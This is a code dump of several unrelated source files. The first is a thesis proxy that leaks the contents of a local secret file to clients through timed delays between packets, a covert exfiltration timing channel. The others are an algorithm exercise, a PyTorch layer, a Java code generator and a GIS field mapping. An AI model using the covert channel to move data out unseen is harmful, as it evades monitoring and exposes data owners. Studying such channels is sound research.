time\nimport select\nimport socket\nimport sys\n\nclass Proxy:\n def __init__(self):\n\n if len(sys.argv) != 2:\n print(\"Program needs exactly one argument: device_IP (or localhost)\")\n sys.exit(0)\n else:\n self.proxyIP = sys.argv[1]\n\n self.lsock = []\n self.msgToClient = []\n self.msgToServer = []\n self.lastSend = []\n self.pause = 1\n self.secretData = []\n self.longBreak = 0.08 # sec\n self.factor = 0.5 # difference between long and short break\n self.shortBreak = self.longBreak * self.factor\n self.fileCursor = []\n self.breakBetweenTransmit = 1\n self.fileStart = True\n\n # cuts the IP-address out of the http request (URL)\n def cutIpFromData(self, data):\n data = data.decode('Latin-1')\n pos = data.find(\"http:/\")\n if pos != -1:\n data = data[:pos] + data[(pos + len(\"http:/\")):]\n split = data.split(\"/\")\n pos = data.find(split[1])\n if pos != -1:\n data = data[:pos - 1] + data[(pos + len(split[1])):]\n\n data = data.encode('Latin-1')\n return data\n\n # gets the IP-Address from the request\n def getAddress(self, request):\n requestStr = str(request) # parse the first line\n first_line = requestStr.split(' ')\n print(first_line)\n if len(first_line) == 0: # get url\n print(requestStr)\n if len(first_line) > 2:\n self.url = first_line[1]\n print(self.url)\n urlObj = urlparse(self.url)\n else:\n return\n\n if urlObj.netloc == \"\":\n portStart = urlObj.path.find(\":\")\n if portStart == -1:\n self.webserverPort = 443 #default\n self.webserver = urlObj.path\n else:\n self.webserverPort = int(urlObj.path[(portStart + 1):])\n self.webserver = urlObj.path[0:portStart]\n\n else:\n portStart = urlObj.netloc.find(\":\")\n if portStart == -1:\n self.webserverPort = 80 #default\n self.webserver = urlObj.netloc\n else:\n self.webserverPort = int(urlObj.netloc[(portStart + 1):])\n self.webserver = urlObj.netloc[0:portStart]\n\n print(self.webserver + \" \" + str(self.webserverPort))\n\n #is called when a new client connects, also builds a server socket\n def newClient(self, s):\n (self.clientSocket, self.client_address) = s.accept() # Establish the connection\n print(\"client accepted\")\n\n request = self.clientSocket.recv(20000)\n\n self.webserverPort = -1\n self.webserver = \"\"\n\n if request != \"\":\n self.getAddress(request)\n\n if self.webserver != \"\" and self.webserverPort != -1:\n try:\n self.serverSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.serverSocket.connect((self.webserver, self.webserverPort))\n\n\n request = self.cutIpFromData(request)\n print(request)\n self.serverSocket.sendall(request)\n\n\n self.lsock.append(self.clientSocket)\n self.lsock.append(self.serverSocket)\n\n self.msgToServer.append([])\n self.msgToClient.append([])\n self.lastSend.append(time.time())\n self.fileCursor.append(0)\n\n print(\"server and client added\")\n\n except:\n e = sys.exc_info()[0]\n print(e)\n\n # searches a socket in the socket ist and returns its value\n def getSocketIndex(self, s):\n sockIndex = -1\n for sock in self.lsock:\n if sock == s:\n sockIndex += 1\n break;\n else:\n sockIndex += 1\n return sockIndex\n\n # checks if the readable socket is from client or the server\n def read(self, readable):\n for s in readable:\n sockIndex = self.getSocketIndex(s)\n if sockIndex == 0:\n self.newClient(s)\n else:\n if sockIndex % 2 == 0:\n self.readFromServer(s, sockIndex)\n else:\n self.readFromClient(s, sockIndex)\n\n # checks if the writable socket is from client or the server\n def send(self, writable):\n for t in writable:\n sockIndex = self.getSocketIndex(t)\n if sockIndex == 0:\n print(\"unlikely to happen\")\n else:\n if sockIndex % 2 == 0:\n self.sendToServer(t, sockIndex)\n else:\n self.sendToClient(t, sockIndex)\n\n def readFromServer(self, s, sockIndex):\n data = s.recv(48)\n if data != b'':\n self.msgToClient[(int(sockIndex / 2) - 1)].append(data)\n #print((\"\\nFROM SERFER\\n\" + str(self.msgToClient[int((sockIndex / 2) - 1)])))\n\n def readFromClient(self, s, sockIndex):\n data = s.recv(48)\n if data != b'':\n self.msgToServer[int((sockIndex - 1) / 2)].append(data)\n #print((\"\\nFROM CLIENT\\n\" + str(self.msgToServer[int((sockIndex - 1) / 2)])))\n\n\n def sendToClient(self, t, sockIndex):\n if len(self.msgToClient[int((sockIndex-1)/2)]) != 0:\n\n #calculates time diverence\n lastTime = self.lastSend[int((sockIndex - 1) / 2)]\n currenTime = time.time()\n div = currenTime - lastTime\n\n # checks if it is not the file start and sets the break\n if self.pause != self.breakBetweenTransmit:\n if self.secretData[self.fileCursor[int((sockIndex - 1) / 2)]] == '1':\n self.pause = self.longBreak\n else:\n if self.secretData[self.fileCursor[int((sockIndex - 1) / 2)]] == '0':\n self.pause = self.shortBreak\n else:\n self.pause = 0.01\n\n # checks if the break is over\n if div > self.pause:\n if self.pause == self.breakBetweenTransmit:\n self.pause = 0\n data = self.msgToClient[int((sockIndex - 1) / 2)].pop(0)\n try:\n t.sendall(data)\n self.lastSend[int((sockIndex - 1) / 2)] = time.time()\n except:\n print(sys.exc_info()[0])\n return\n\n self.pause = 0\n data = self.msgToClient[int((sockIndex - 1) / 2)].pop(0)\n print(\"\\nTO CLIENT\\n\" + str(data))\n try:\n t.sendall(data)\n self.lastSend[int((sockIndex - 1) / 2)] = time.time()\n # end of file\n if len(self.secretData) - 1 == self.fileCursor[int((sockIndex - 1) / 2)]:\n self.fileCursor[int((sockIndex - 1) / 2)] = 0\n self.pause = self.breakBetweenTransmit\n else:\n self.fileCursor[int((sockIndex - 1) / 2)] += 1\n except:\n print(sys.exc_info()[0])\n\n\n def sendToServer(self, t, sockIndex):\n if len(self.msgToServer[int((sockIndex / 2) - 1)]) != 0:\n data = self.msgToServer[int((sockIndex / 2) - 1)].pop(0);\n data = self.cutIpFromData(data)\n print(\"\\nTO SERVER\\n\" + str(data))\n try:\n t.sendall(data)\n except:\n print(sys.exc_info()[0])\n\n # generates 8 Bit Pearson Hash\n def hash8(self,data):\n #mapping tabel\n s = [129, 69, 229, 238, 16, 104, 178, 222, 95, 5, 171, 147, 231, 170, 105,\n 61, 85, 217, 236, 223, 87, 221, 60, 38, 125, 151, 124, 86, 137, 143,\n 230, 25, 228, 116, 62, 12, 150, 42, 177, 65, 207, 20, 122, 67, 109,\n 220, 208, 102, 183, 90, 28, 15, 245, 97, 145, 162, 156, 181, 155,\n 233, 111, 43, 157, 120, 247, 83, 194, 126, 34, 18, 198, 57, 121,\n 164, 74, 218, 8, 138, 130, 37, 51, 193, 4, 244, 152, 40, 45, 89,\n 35, 209, 21, 224, 76, 189, 96, 17, 201, 235, 64, 161, 68, 254,\n 202, 174, 44, 66, 133, 91, 72, 195, 210, 22, 52, 172, 56, 114,\n 63, 48, 197, 127, 88, 173, 0, 117, 10, 41, 106, 192, 188, 252,\n 169, 199, 242, 31, 214, 136, 7, 23, 103, 251, 6, 185, 11, 123,\n 98, 182, 46, 118, 110, 36, 225, 249, 160, 3, 163, 100, 80, 53,\n 1, 190, 141, 13, 255, 146, 93, 14, 140, 166, 211, 78, 184, 232,\n 108, 115, 19, 32, 167, 9, 113, 165, 253, 226, 132, 187, 154, 227,\n 205, 206, 58, 59, 134, 55, 128, 131, 204, 200, 24, 196, 144, 75, 216,\n 158, 49, 94, 107, 180, 168, 142, 119, 219, 153, 248, 212, 159, 239, 186,\n 179, 54, 27, 30, 84, 149, 203, 2, 191, 215, 175, 139, 81, 47, 92, 240, 241,\n 148, 77, 26, 70, 71, 176, 99, 39, 234, 33, 50, 82, 213, 112, 237, 73, 135,\n 250, 101, 243, 246, 79, 29]\n result = []\n for byte in range(1):\n h = s[(int(data[0]) + byte) % 256]\n for c in data[1:]:\n h = s[h ^ int(c)]\n result.append(h)\n return result\n\n def getSecreteData(self):\n print(\"Secret Data:\")\n f = open(\"Secret/secret\", \"rb\")\n try:\n self.secretData = f.read()\n finally:\n f.close()\n self.secretData = BitArray(hex=self.secretData.hex()).bin\n hash = self.hash8(self.secretData)[0]\n hash = BitArray(hex=hex(hash)).bin\n self.secretData = list(self.secretData+hash)\n\n # adding 2 Byte of sync\n sync = [\"x\",\"x\",\"x\",\"x\",\"x\",\"x\",\"x\",\"x\",\"x\",\"x\",\"x\",\"x\"]\n self.secretData = sync+self.secretData\n print(self.secretData)\n\n #main function\n def proxy(self):\n\n # Create a TCP socket\n self.listenSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.listenSocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) # Re-use the socket\n self.listenSocket.bind((self.proxyIP, 80)) # bind the socket to a public host, and a port\n self.listenSocket.listen(10) # become a server socket\n\n self.lsock.append(self.listenSocket)\n while True:\n readable, writable, exceptional = select.select(self.lsock, self.lsock, self.lsock)\n self.read(readable)\n self.send(writable)\n time.sleep(0.00002)\n\n\nproxy = Proxy()\nproxy.getSecreteData()\n\nproxy.proxy()\n\nwhile 1:\n pass\n","sub_path":"Bachelorarbeit_Maximilian_Nestle/Code/Proxy/Proxy.py","file_name":"Proxy.py","file_ext":"py","file_size_in_byte":10805,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"257639892","text":"'''\nWrite a program which takes as input a set of integers represented by an array, and returns the size of a large subset\n`of integers in the array having the property that if two integers are in the subset, then so are all integers between them.\nFor example, if th einput is [3,-2,7,9,8,1,2,0,-1,5,8], the largest such subset is [-2,-1,0,1,2,3], so you should return 6.\n\nHint: Do you really need a totla ordering on the input?\n'''\n\n'''\nSolution:\n\nThe brute-force algorithm is to sort the array and then iterate through it, recording for each entry the largest subset\nwith the desired property ending at that entry.\n\nActually, don't need sortind and don't need the total ordering All we care about is whether the integers adjacent to a given\nvalue are present. Can use hash table to store the entries. \n\nIterate over the entires in the array, if an entry e is present in the hash table, we compute the largest interval including \ne such that all values in the interval are contained in the hash table. Iteratively searching entires in the hash table of the form\ne + 1, e + 2,...., and e - 1, e - 2,.... When we are done, to avoid doing duplicated computation, we remove all the entries\nin the computed interval from the hash table, since all these entries are in the same largest contained interval\n\n\nExample: \nConsider A = [10,5,3,11,6,100,4]. We initialize the hash table to {6,10,3,11,5,100,4}. The first entry in A is 10, and we find the \nlargest interval contained in A including 10 by expanding from 10 in each direction by doing lookups in the hash table. The largest \nset is {10,11} and is of size 2. This computation updates the hash table to {6,3,5,100,4}. The next entry in A is 5. Since it \nis contained in the hash table, we know that the largest interval contained in A including 5 has not been computed yet. Expanding from 5,\nwe see that 3,4,6 are all in the hash table, and 2 and 7 are not in the hash table, so the largest set containing 5 is {3,4,5,6}, which is of size\n4. We update the hash table to {100}. The three entries after 5, namelyu 3,11,6 are not present in the hash table, we know we have \nalready computed the longest intervals in A containing each of these. Then we get to 100, which cannot be extended, so the largest set \ncontaining it is {100}, which is of size 1. We update the hash table to {}. Since 4 is not in the hash table, we can skip it. \nThe largest of the three sets is {3,4,5,6} \n\nTime complexity: O(n), where n is the array length, since we add and remove array elements in the hash table no more than once.\n'''\n\ndef longest_contained_range(A):\n # unprocessed_entries records the existence of each entry in A.\n unprocessed_entries = set(A)\n\n max_interval_size = 0\n while unprocessed_entries:\n a = unprocessed_entries.pop()\n\n # Finds the lower bound of the largest range containing a.\n lower_bound = a - 1\n while lower_bound in unprocessed_entries:\n unprocessed_entries.remove(lower_bound)\n lower_bound -= 1\n\n # Finds the upper bound of th elargest range containing a.\n upper_bound = a + 1\n while upper_bound in unprocessed_entries:\n unprocessed_entries.remove(upper_bound)\n upper_bound += 1\n\n max_interval_size = max(max_interval_size, upper_bound - lower_bound - 1)\n\n\n return max_interval_size\n","sub_path":"epi/hash/length_of_longest_contained_interval.py","file_name":"length_of_longest_contained_interval.py","file_ext":"py","file_size_in_byte":3359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"70097527","text":"import torch\n\nclass DropBlock(torch.nn.module):\n def __init__(self, block_size=7, keep_prob=0.9):\n self.block_size = block_size\n self.keep_prob = keep_prob\n self.gamma = None\n self.kernel_size = (block_size, block_size)\n self.stride = (1, 1)\n self.padding = (block_size//2, block_size//2)\n \n def calculate_gamma(self, x):\n return (1 - self.keep_prob) * x.shape[-1]**2/\\\n (self.block_size**2 * (x.shape[-1] - self.block_size + 1)**2) \n \n def forward(self, x):\n if not self.training:\n return x\n if self.gamma is None:\n self.gamma = self.calculate_gamma(x)\n p = torch.ones_like(x) * self.gamma\n mask = 1 - torch.nn.functional.max_pool2d(torch.bernoulli(p),\n self.kernel_size,\n self.stride,\n self.padding)\n return mask * x * (mask.numel()/mask.sum())\n","sub_path":"layer.py","file_name":"layer.py","file_ext":"py","file_size_in_byte":1030,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"356777483","text":"# coding=utf8\nimport collections\nimport shutil\nimport os\nimport codecs\nimport jinja2\n\n__author__ = 'yanwenyuan'\n\n\nclass Framework(object):\n @classmethod\n def copy(cls, src_path, des_path):\n if os.path.exists(des_path):\n shutil.rmtree(des_path)\n shutil.copytree(src_path, des_path, False)\n\n @classmethod\n def rm(cls, path):\n if os.path.exists(path):\n shutil.rmtree(path)\n\n @classmethod\n def render(cls, datas, template_file='xxxMapper.xml', template_path='java_templates',\n output_path='', output_file=''):\n\n \"\"\"\n :param datas: 页面所需数据\n :param template: 基础模板文件名\n :param template_path: 基础模板路径\n :return: 生成的文件路径(utf8编码)\n \"\"\"\n\n env = jinja2.Environment(loader=jinja2.PackageLoader(__name__, template_path))\n conf_template = env.get_template(template_file)\n\n out = conf_template.render(**datas)\n\n if not os.path.exists(output_path):\n os.makedirs(output_path)\n\n with codecs.open(output_path + output_file, 'w', 'utf8') as f:\n f.write(out)\n\n @classmethod\n def web(cls, datas):\n web_base_path = datas['output_path'] + datas['artifactId'] + '/' + datas['artifactId'] + '-web/'\n web_res_path = web_base_path + '' + 'src/main/'\n web_java_path = web_base_path + '' + data['common_path'] + data['package_path'] + 'web/'\n\n print('web:' + web_java_path)\n print('BUILDING - web Controller')\n cls.render(datas=datas, template_file='xxxController.java',\n template_path='java_templates/web/java/controller',\n output_path=web_java_path + 'controller/',\n output_file=datas['table_name_uppercase'] + 'Controller.java')\n cls.render(datas=datas, template_file='BaseController.java',\n template_path='java_templates/web/java/controller',\n output_path=web_java_path + 'controller/',\n output_file='BaseController.java')\n print('OK - ' + datas['table_name_uppercase'] + 'Controller.java')\n\n print('BUILDING - web base classs')\n cls.render(datas=datas, template_file='CustomDateEditor.java',\n template_path='java_templates/web/java/common',\n output_path=web_java_path + 'common/',\n output_file='CustomDateEditor.java')\n\n cls.render(datas=datas, template_file='BeanUtils.java',\n template_path='java_templates/web/java/utils',\n output_path=web_java_path + 'utils/',\n output_file='BeanUtils.java')\n\n cls.render(datas=datas, template_file='WebUtils.java',\n template_path='java_templates/web/java/utils',\n output_path=web_java_path + 'utils/',\n output_file='WebUtils.java')\n\n # cls.copy('java_templates/web/java/common', web_java_path+'common')\n # cls.copy('java_templates/web/java/utils', web_java_path+'utils')\n print('OK - web base classs')\n\n print('BUILDING - web resources')\n cls.copy('java_templates/web/resources/conf', web_res_path + 'resources/conf')\n shutil.copy('java_templates/web/resources/log4j.xml', web_res_path + 'resources/log4j.xml')\n cls.render(datas=datas, template_file='spring-config-dao.xml',\n template_path='java_templates/web/resources',\n output_path=web_res_path + 'resources/',\n output_file='spring-config-dao.xml')\n cls.render(datas=datas, template_file='spring-config-servlet.xml',\n template_path='java_templates/web/resources',\n output_path=web_res_path + 'resources/',\n output_file='spring-config-servlet.xml')\n cls.render(datas=datas, template_file='spring-config-service.xml',\n template_path='java_templates/web/resources',\n output_path=web_res_path + 'resources/',\n output_file='spring-config-service.xml')\n cls.render(datas=datas, template_file='spring-config.xml',\n template_path='java_templates/web/resources',\n output_path=web_res_path + 'resources/',\n output_file='spring-config.xml')\n print('OK - web resources')\n\n print('BUILDING - web webapp')\n cls.copy('java_templates/web/webapp', web_res_path + 'webapp')\n # CURD\n cls.rm(web_res_path + 'webapp/WEB-INF/views/baseOperator')\n cls.render(datas=datas, template_file='edit.vm',\n template_path='java_templates/web/webapp/WEB-INF/views/baseOperator',\n output_path=web_res_path + 'webapp/WEB-INF/views/' + datas[\"table_name_lowercase\"] + '/',\n output_file='edit.vm')\n cls.render(datas=datas, template_file='list.vm',\n template_path='java_templates/web/webapp/WEB-INF/views/baseOperator',\n output_path=web_res_path + 'webapp/WEB-INF/views/' + datas[\"table_name_lowercase\"] + '/',\n output_file='list.vm')\n cls.render(datas=datas, template_file='search.vm',\n template_path='java_templates/web/webapp/WEB-INF/views/baseOperator',\n output_path=web_res_path + 'webapp/WEB-INF/views/' + datas[\"table_name_lowercase\"] + '/',\n output_file='search.vm')\n cls.render(datas=datas, template_file='view.vm',\n template_path='java_templates/web/webapp/WEB-INF/views/baseOperator',\n output_path=web_res_path + 'webapp/WEB-INF/views/' + datas[\"table_name_lowercase\"] + '/',\n output_file='view.vm')\n print('OK - web webapp')\n\n print('BUILDING - web properties')\n shutil.copy('java_templates/web/local.properties', web_base_path + 'local.properties')\n print('OK - web properties')\n\n print('BUILDING - web pom')\n cls.render(datas=datas, template_file='pom.xml',\n template_path='java_templates/web/',\n output_path=web_base_path + '',\n output_file='pom.xml')\n print('OK - web pom')\n\n @classmethod\n def service(cls, datas):\n service_base_path = datas['output_path'] + datas['artifactId'] + '/' + datas['artifactId'] + '-service' + '/'\n service_path = service_base_path + data['common_path'] + data['package_path'] + 'service/'\n\n print('service:' + service_path)\n # interface\n print('BUILDING - service java - interface')\n cls.render(datas=datas, template_file='xxxService.java',\n template_path='java_templates/service',\n output_path=service_path,\n output_file=datas['table_name_uppercase'] + 'Service.java')\n print('OK - ' + datas['table_name_uppercase'] + 'Service.java')\n\n # impl\n print('BUILDING - service java - impl')\n cls.render(datas=datas, template_file='xxxServiceImpl.java',\n template_path='java_templates/service/impl',\n output_path=service_path + 'impl/',\n output_file=datas['table_name_uppercase'] + 'ServiceImpl.java')\n print('OK - ' + datas['table_name_uppercase'] + 'ServiceImpl.java')\n\n # base\n print('BUILDING - service base class')\n cls.render(datas=datas, template_file='BaseService.java',\n template_path='java_templates/service/base/',\n output_path=service_path + 'base/',\n output_file='BaseService.java')\n cls.render(datas=datas, template_file='BaseServiceImpl.java',\n template_path='java_templates/service/base/',\n output_path=service_path + 'base/',\n output_file='BaseServiceImpl.java')\n\n # cls.copy('java_templates/service/base', service_path+'base')\n print('OK - service base class')\n\n # pom\n print('BUILDING - service pom')\n cls.render(datas=datas, template_file='pom.xml',\n template_path='java_templates/service/',\n output_path=service_base_path,\n output_file='pom.xml')\n print('OK - service pom')\n\n @classmethod\n def dao(cls, datas):\n dao_base_path = datas['output_path'] + datas['artifactId'] + '/' + datas['artifactId'] + '-dao' + '/'\n dao_path = dao_base_path + data['common_path'] + data['package_path'] + 'dao/'\n\n dao_template_path = 'java_templates/dao/java/'\n\n print('dao:' + dao_path)\n # interface\n print('BUILDING - dao java - interface')\n cls.render(datas=datas, template_file='xxxDao.java',\n template_path=dao_template_path,\n output_path=dao_path,\n output_file=datas['table_name_uppercase'] + 'Dao.java')\n print('OK - ' + datas['table_name_uppercase'] + 'Dao.java')\n\n # impl\n print('BUILDING - dao java - impl')\n cls.render(datas=datas, template_file='xxxDaoImpl.java',\n template_path=dao_template_path + 'impl',\n output_path=dao_path + 'impl/',\n output_file=datas['table_name_uppercase'] + 'DaoImpl.java')\n print('OK - ' + datas['table_name_uppercase'] + 'DaoImpl.java')\n\n # base\n print('BUILDING - dao base class')\n cls.render(datas=datas, template_file='AppException.java',\n template_path=dao_template_path + 'base',\n output_path=dao_path + 'base/',\n output_file='AppException.java')\n cls.render(datas=datas, template_file='BaseDao.java',\n template_path=dao_template_path + 'base',\n output_path=dao_path + 'base/',\n output_file='BaseDao.java')\n cls.render(datas=datas, template_file='BaseDaoImpl.java',\n template_path=dao_template_path + 'base',\n output_path=dao_path + 'base/',\n output_file='BaseDaoImpl.java')\n cls.render(datas=datas, template_file='MyBatisSupport.java',\n template_path=dao_template_path + 'base',\n output_path=dao_path + 'base/',\n output_file='MyBatisSupport.java')\n\n # cls.copy(dao_template_path+'base', dao_path+'base')\n print('OK - doa base class')\n\n # resource\n print('BUILDING - dao resource - sqlmap')\n cls.render(datas=datas, template_file='xxxMapper.xml',\n template_path=dao_template_path + 'resources/sqlmap',\n output_path=dao_base_path + 'src/main/resources/sqlmap/',\n output_file=datas['table_name_uppercase'] + '.xml')\n print('OK - ' + datas['table_name_uppercase'] + '.xml')\n\n print('BUILDING - dao resource - sqlconfig')\n cls.render(datas=datas, template_file='sqlmap-config.xml',\n template_path=dao_template_path + 'resources',\n output_path=dao_base_path + 'src/main/resources/',\n output_file='sqlmap-config.xml')\n print('OK - sqlmap-config.xml')\n\n # pom\n print('BUILDING - dao pom')\n cls.render(datas=datas, template_file='pom.xml',\n template_path='java_templates/dao/',\n output_path=dao_base_path,\n output_file='pom.xml')\n print('OK - dao pom')\n\n @classmethod\n def domain(cls, datas):\n domain_base_path = datas['output_path'] + datas['artifactId'] + '/' + datas['artifactId'] + '-domain' + '/'\n domain_path = domain_base_path + data['common_path'] + data['package_path'] + 'domain/'\n\n template_path = 'java_templates/domain/'\n\n print('domain:' + domain_path)\n print('BUILDING - base domain java - DB entity')\n cls.render(datas=datas, template_file='xxx.java',\n template_path=template_path + 'java',\n output_path=domain_path,\n output_file=datas['table_name_uppercase'] + '.java')\n print('OK -' + datas['table_name_uppercase'] + '.java')\n\n print('BUILDING - request create domain - handle post request')\n cls.render(datas=datas, template_file='xxxForm.java',\n template_path=template_path + 'java/requestForm',\n output_path=domain_path + 'requestForm/',\n output_file=datas['table_name_uppercase'] + 'Form.java')\n print('OK - ' + datas['table_name_uppercase'] + 'Form.java')\n\n print('BUILDING - request query domain - handle get request')\n cls.render(datas=datas, template_file='xxxQueryForm.java',\n template_path=template_path + 'java/requestForm',\n output_path=domain_path + 'requestForm/',\n output_file=datas['table_name_uppercase'] + 'QueryForm.java')\n print('OK - ' + datas['table_name_uppercase'] + 'QueryForm.java')\n\n print('BUILDING - base domain classes')\n cls.render(datas=datas, template_file='BaseDomain.java',\n template_path=template_path + 'java/base',\n output_path=domain_path + 'base/',\n output_file='BaseDomain.java')\n cls.render(datas=datas, template_file='BaseQuery.java',\n template_path=template_path + 'java/base',\n output_path=domain_path + 'base/',\n output_file='BaseQuery.java')\n cls.render(datas=datas, template_file='Result.java',\n template_path=template_path + 'java/base',\n output_path=domain_path + 'base/',\n output_file='Result.java')\n\n cls.render(datas=datas, template_file='Message.java',\n template_path=template_path + 'java/common',\n output_path=domain_path + 'common/',\n output_file='Message.java')\n cls.render(datas=datas, template_file='Page.java',\n template_path=template_path + 'java/common',\n output_path=domain_path + 'common/',\n output_file='Page.java')\n print('OK - base domain classes')\n\n # pom\n print('BUILDING - domain pom')\n cls.render(datas=datas, template_file='pom.xml',\n template_path=template_path,\n output_path=domain_base_path,\n output_file='pom.xml')\n print('OK - domain pom')\n\n @classmethod\n def project(cls, datas):\n project_path = datas['output_path'] + datas['artifactId'] + '/'\n print('project: ' + project_path)\n print('BUILDING - project pom (include dependencies...)')\n cls.render(datas=datas, template_file='pom.xml',\n template_path='java_templates',\n output_path=project_path,\n output_file='pom.xml')\n print('OK - pom.xml')\n\n\nif __name__ == '__main__':\n # ------------------------------- NEW\n data = {}\n # 项目名称\n data['groupId'] = \"com.dili\"\n data['artifactId'] = \"xm-product-b2b\"\n\n # 包基础名称\n data['base_package'] = \"com.diligrp.titan\"\n data['table_name_lowercase'] = \"product\"\n data['table_name_uppercase'] = data['table_name_lowercase'].capitalize()\n data['domain'] = {'id': ('Long', u'ID', 'id'),\n 'pname': ('String', u'商品名称', 'pname'),\n 'weight': ('Long', u'商品重量', 'weight')}\n\n # 工程路径\n data['output_path'] = '/Users/yanwenyuan/Desktop/'\n data['common_path'] = 'src/main/java/'\n data['package_path'] = data['base_package'].replace('.', '/') + '/'\n\n Framework.project(data)\n Framework.web(data)\n Framework.service(data)\n Framework.domain(data)\n Framework.dao(data)\n","sub_path":"new.py","file_name":"new.py","file_ext":"py","file_size_in_byte":15924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"434103749","text":"MODEL_MAPPING = {\n \"pittsburgh_neighborhood\": {\n \"url\": \"\",\n \"source\": \"pgh_hood/Pittsburgh_Neighborhoods.shp\",\n \"model\": \"PghHood\",\n \"mapping\": {\n \"objectid\": \"objectid\",\n \"fid_blockg\": \"fid_blockg\",\n \"statefp10\": \"statefp10\",\n \"countyfp10\": \"countyfp10\",\n \"tractce10\": \"tractce10\",\n \"blkgrpce10\": \"blkgrpce10\",\n \"geoid10\": \"geoid10\",\n \"namelsad10\": \"namelsad10\",\n \"mtfcc10\": \"mtfcc10\",\n \"funcstat10\": \"funcstat10\",\n \"aland10\": \"aland10\",\n \"awater10\": \"awater10\",\n \"intptlat10\": \"intptlat10\",\n \"intptlon10\": \"intptlon10\",\n \"shape_leng\": \"shape_leng\",\n \"fid_neighb\": \"fid_neighb\",\n \"pghdbsdene\": \"pghdbsdeNe\",\n \"perimeter\": \"perimeter\",\n \"neighbor_field\": \"neighbor_\",\n \"neighbor_i\": \"neighbor_i\",\n \"hood\": \"hood\",\n \"hood_no\": \"hood_no\",\n \"acres\": \"acres\",\n \"sqmiles\": \"sqmiles\",\n \"dpwdiv\": \"dpwdiv\",\n \"unique_id\": \"unique_id\",\n \"sectors\": \"sectors\",\n \"shape_le_1\": \"shape_le_1\",\n \"shape_ar_1\": \"shape_ar_1\",\n \"page_numbe\": \"page_numbe\",\n \"plannerass\": \"plannerass\",\n \"created_us\": \"created_us\",\n \"created_da\": \"created_da\",\n \"last_edite\": \"last_edite\",\n \"last_edi_1\": \"last_edi_1\",\n \"geom\": \"MULTIPOLYGON\"\n }\n },\n \"pittsburgh_fire_zone\": {\n \"source\": \"pgh_fire_zone/fire_zone.shp\",\n \"model\": \"PghFireZone\",\n \"mapping\": {\n \"cartodb_id\": \"cartodb_id\",\n \"firezones1\": \"firezones1\",\n \"firezones_field\": \"firezones_\",\n \"mapbook\": \"mapbook\",\n \"olddist_zo\": \"olddist_zo\",\n \"dist_zone\": \"dist_zone\",\n \"shape_area\": \"shape_area\",\n \"shape_leng\": \"shape_leng\",\n \"perimeter\": \"perimeter\",\n \"area\": \"area\",\n \"dist\": \"dist\",\n \"geom\": \"MULTIPOLYGON\"\n }\n },\n \"pittsburgh_police_zone\": {\n \"source\": \"pgh_police/Pittsburgh_Police_Zones.shp\",\n \"model\": \"PghPoliceZone\",\n \"mapping\": {\n \"objectid\": \"objectid\",\n \"perimeter\": \"perimeter\",\n \"zone\": \"zone\",\n \"geom\": \"MULTIPOLYGON\"\n }\n },\n \"pittsburgh_ward\": {\n \"source\": \"pgh_ward/wards.shp\",\n \"model\": \"PghWard\",\n \"mapping\": {\n \"fid\": \"FID\",\n \"area\": \"AREA\",\n \"perimeter\": \"PERIMETER\",\n \"wards_field\": \"WARDS_\",\n \"wards_id\": \"WARDS_ID\",\n \"ward\": \"WARD\",\n \"acres\": \"ACRES\",\n \"sqmiles\": \"SQMILES\",\n \"unique_id\": \"UNIQUE_ID\",\n \"council\": \"COUNCIL\",\n \"dpw_insp\": \"DPW_INSP\",\n \"shape_leng\": \"Shape_Leng\",\n \"shape_area\": \"Shape_Area\",\n \"geom\": \"MULTIPOLYGON\"\n }\n },\n \"pittsburgh_city_council\": {\n \"source\": \"pgh_city_council/Pittsburgh_City_Council_Districts.shp\",\n \"model\": \"PghCityCouncil\",\n \"mapping\": {\n \"objectid_1\": \"objectid_1\",\n \"objectid\": \"objectid\",\n \"intptlat10\": \"intptlat10\",\n \"intptlon10\": \"intptlon10\",\n \"shape_leng\": \"shape_leng\",\n \"council\": \"council\",\n \"councilman\": \"councilman\",\n \"committee\": \"committee\",\n \"phone\": \"phone\",\n \"geom\": \"MULTIPOLYGON\"\n }\n },\n \"pittsburgh_dpw_division\": {\n \"source\": \"pgh_dpw_division/PGH_DPWDivisions.shp\",\n \"model\": \"PghPublicWorks\",\n \"mapping\": {\n \"objectid\": \"objectid\",\n # \"pghdbsdedp\": \"pghdbsdeDP\",\n \"perimeter\": \"perimeter\",\n \"dpwdivs_field\": \"dpwdivs_\",\n \"dpwdivs_id\": \"dpwdivs_id\",\n #\"sqmiles\": \"sqmiles\",\n #\"acres\": \"acres\",\n \"division\": \"division\",\n #\"supervsr\": \"supervsr\",\n \"unique_id\": \"unique_id\",\n #\"sq_miles\": \"sq_miles\",\n #\"dpw_divisi\": \"dpw_divisi\",\n \"geom\": \"MULTIPOLYGON\"\n }\n },\n \"allegheny_county_municipality\": {\n \"source\": \"ac_municipalities/Allegheny_County_Municipal_Boundaries.shp\",\n \"model\": \"ACMunicipality\",\n \"mapping\": {\n \"objectid\": \"OBJECTID\",\n \"muni_name\": \"NAME\",\n \"muni_type\": \"TYPE\",\n \"label\": \"LABEL\",\n \"cog\": \"COG\",\n \"schoold\": \"SCHOOLD\",\n \"congdist\": \"CONGDIST\",\n \"fips\": \"FIPS\",\n \"region\": \"REGION\",\n \"acres\": \"ACRES\",\n \"sqmi\": \"SQMI\",\n \"municode\": \"MUNICODE\",\n \"cntl_id\": \"CNTL_ID\",\n \"cntycounci\": \"CNTYCOUNCI\",\n \"eoc\": \"EOC\",\n \"assessorte\": \"ASSESSORTE\",\n \"valuationa\": \"VALUATIONA\",\n \"yearconver\": \"YEARCONVER\",\n \"globalid\": \"GlobalID\",\n \"geom\": \"MULTIPOLYGON\"\n }\n },\n \"block_group\": {\n \"source\": \"block_groups/Allegheny_County_Census_Block_Groups_2016.shp\",\n \"model\": \"BlockGroup\",\n \"mapping\": {\n \"fid\": \"FID\",\n \"state\": \"STATEFP\",\n \"county\": \"COUNTYFP\",\n \"tract\": \"TRACTCE\",\n \"block_grp\": \"BLKGRPCE\",\n \"geom\": \"MULTIPOLYGON\"\n }\n },\n \"census_tract\": {\n \"source\": 